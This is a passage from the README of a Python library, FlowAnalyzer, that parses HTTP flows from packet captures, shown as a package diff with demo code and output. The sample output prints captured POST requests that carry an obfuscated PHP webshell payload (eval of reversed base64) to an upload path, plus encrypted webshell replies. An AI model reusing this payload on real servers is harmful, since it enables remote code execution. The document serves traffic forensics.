|
-
|
|
37
|
-
|
|
38
|
-
baseDir = os.path.dirname(os.path.abspath(__file__))
|
|
39
|
-
flowPath = os.path.join(baseDir, "flow.pcapng")
|
|
40
|
-
display_filter = "(http.request and urlencoded-form) or (http.request and data-text-lines) or (http.request and mime_multipart) or (http.response.code == 200 and data-text-lines)"
|
|
41
|
-
|
|
42
|
-
jsonPath = FlowAnalyzer.get_json_data(flowPath, display_filter=display_filter)
|
|
43
|
-
for count, http in enumerate(FlowAnalyzer(jsonPath).generate_http_dict_pairs(), start=1):
|
|
44
|
-
print(f"[+] 正在处理第{count}个HTTP流!")
|
|
45
|
-
|
|
46
|
-
request, response = http.request, http.response
|
|
47
|
-
if request:
|
|
48
|
-
request_num, header, file_data, time_epoch = request.frame_num, request.header, request.file_data, request.time_epoch
|
|
49
|
-
print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(request_num, header, file_data, time_epoch))
|
|
50
|
-
|
|
51
|
-
if response:
|
|
52
|
-
response_num, header, file_data, time_epoch = response.frame_num, response.header, response.file_data, response.time_epoch
|
|
53
|
-
print("序号: {}请求包, 请求头: {}, 文件: {}, 时间: {}".format(response_num, header, file_data, time_epoch))
|
|
54
|
-
```
|
|
55
|
-
|
|
56
|
-
```
|
|
57
|
-
$ python3 .\tests\demo.py
|
|
58
|
-
[+] 正在处理第1个HTTP流!
|
|
59
|
-
序号: 2请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1403', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1YCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOQNpHlpcBNa5IHIHHrIHEy7jch%2Fv3Z2Y0lq8qSQQkYhwWZhxVpNq1liOGE%3D', 时间: 1682596262.982344
|
|
60
|
-
序号: 3请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:02 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'70\r\n72a9c691ccdaab98fL1tMGI4YTljMh76GrwuHij67J+qF+t2KR17BwHlSvtL1mdSPnoksIZRS0N0Xi89+zNlNaUo+3xjMTU=b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596262.992406
|
|
61
|
-
[+] 正在处理第2个HTTP流!
|
|
62
|
-
序号: 5请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1409', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTF1cCWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOTReMrqj%2Fx6aH4XU%2BWInBcrzUhN6o%2FMfL54MmpIY6avwUcSIJBkZUuq7rVUYzE1', 时间: 1682596266.652869
|
|
63
|
-
序号: 6请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:06 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'40\r\n72a9c691ccdaab98fL1tMGI4YTljMh4dHdNjM6AJ3DZmOGE5b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596266.661427
|
|
64
|
-
[+] 正在处理第3个HTTP流!
|
|
65
|
-
序号: 8请求包, 请求头: b'POST /upload/php_eval_xor_base64.php HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0\r\nCookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3;\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\r\nHost: 192.168.225.129\r\nConnection: keep-alive\r\nContent-type: application/x-www-form-urlencoded\r\nContent-Length: 1427', 文件: b'pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTL1ACWEn3M%2BF4ZGJ%2BL2Iz5EofTe8udar8%2BTGDwKtg8LxWYhFKlauQQtYfPnQDdprPQMrHPVjA6hjPeOSdqCqaPC9ZW7GI7C2kIPd0MqlXzqT3svOl%2B1gNW3x0TL4%2BUQ0cdgeygrWzt1XSzu7opY93Nvl1tILnOWMx', 时间: 1682596308.573707
|
|
66
|
-
序号: 9请求包, 请求头: b'HTTP/1.1 200 OK\r\nServer: openresty/1.15.8.1\r\nDate: Thu, 27 Apr 2023 11:51:48 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nX-Powered-By: PHP/5.5.38\r\nSet-Cookie: PHPSESSID=s9ocgt7via0goppc2f8ev033e3; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache', 文件: b'50\r\n72a9c691ccdaab98fL1tMGI4YTljMn75e3jORcmaTQZQeEdS2jE3TKPMeDNjNg==b4c4e1f6ddd2a488\r\n0\r\n\r\n', 时间: 1682596308.582312
|
|
67
|
-
```
|
|
68
|
-
|
|
69
|
-
# Contributing
|
|
70
|
-
Feel free to submit issues or pull requests if you have any suggestions, improvements, or bug reports.
|
|
71
|
-
|
|
72
|
-
# License
|
|
73
|
-
|
|
74
|
-
This project is licensed under the [MIT License.](LICENSE)
|
|
75
|
-
|
|
76
|
-
Platform: UNKNOWN
|
|
77
|
-
Classifier: Development Status :: 3 - Alpha
|
|
78
|
-
Classifier: Intended Audience :: Developers
|
|
79
|
-
Classifier: License :: OSI Approved :: MIT License
|
|
80
|
-
Classifier: Programming Language :: Python :: 3
|
|
81
|
-
Classifier: Programming Language :: Python :: 3.6
|
|
82
|
-
Classifier: Programming Language :: Python :: 3.7
|
|
83
|
-
Classifier: Programming Language :: Python :: 3.8
|
|
84
|
-
Classifier: Programming Language :: Python :: 3.9
|
|
85
|
-
Description-Content-Type: text/markdown
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|
|
File without changes
|